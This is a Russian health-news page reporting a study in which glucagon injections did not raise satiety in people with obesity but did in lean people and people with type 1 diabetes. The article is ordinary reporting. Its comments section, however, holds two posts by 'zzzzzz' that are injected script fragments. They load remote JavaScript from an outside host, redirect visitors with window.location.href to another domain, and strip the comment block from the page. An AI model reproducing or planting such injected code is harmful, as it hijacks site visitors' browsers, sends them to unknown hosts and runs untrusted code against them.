Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  У толстых не работает мех...  >>  У толстых не работает механизм сытости! Как его восстановить?
 
Обратная связь
 

У толстых не работает механизм сытости! Как его восстановить?

Размер шрифта
24 февраля 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, у людей, страдающих ожирением, нарушается работа гормона, который участвует в регуляции аппетита. Данное нарушение препятствует насыщению после приема пищи, и человек постоянно хочет есть!

У толстых не работает механизм сытости! Как его восстановить?

Основная функция глюкагона, гормона поджелудочной железы, состоит в высвобождении глюкозы из печени, когда уровень глюкозы крови снижен. Однако в последнее время появляются данные о том, что глюкагон способен контролировать чувство насыщения путем снижения уровня грелина, гормона аппетита.

«У людей, страдающих ожирением, глюкагон больше не выполняет свою функцию», – говорит автор исследования доктор Эймен Арафат из клиники Шарите, Берлин. «Однако требуются дальнейшие исследования, чтобы выяснить, почему нарушается работа глюкагона даже в тех случаях, когда помимо избыточного веса человек не имеет других заболеваний».

В ходе исследования с плацебо-контролем ученые измеряли уровень глюкагона и аппетит у 11 человек с ожирением, 13 человек с сахарным диабетом 1 типа и 13 человек с низкой массой тела. Участники получали инъекции глюкагона или плацебо, а затем врачи измеряли их аппетит с помощью специальных шкал, а также уровень грелина, гормона аппетита.

Выяснилось, что чувство насыщения у людей с ожирением не зависело от того, получали они гормон глюкагон или плацебо. Наоборот, у людей с низкой массой тела или сахарным диабетом 1 типа инъекции гормона глюкагона вызывали выраженное чувство насыщения по сравнению с плацебо. Данный эффект продолжался даже после 24-х часов после введения гормона.

«Наши результаты могут повлиять на разработку новых лекарственных препаратов для лечения ожирения и диабета», – делится доктор Арафат. «На основании данного исследования можно сделать вывод, что изучаемые сейчас препараты на основе глюкагона и других гормонов могут быть неэффективны у людей, страдающих ожирением».

Читайте больше о лишнем весе в нашем спецпроекте «Сбрось лишнее».

Результаты исследования были опубликованы в «Журнале клинической эндокринологии и метаболизма» Общества Эндокринологии.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выключите компьютер! Из-за него вы толстеете!   Перекус, который заставит вас купить штаны на размер меньше в Новом году   Чтобы худеть, надо есть. Что есть?   Главная причина вашего лишнего веса  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как лишний вес влияет на ваши ноги и их красоту
5 отговорок, которые убивают ваше сердце и мешают похудеть
Как похудеть ничего не делая! Часть 2

Тесты

1
Оцените риск развития сахарного диабета
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.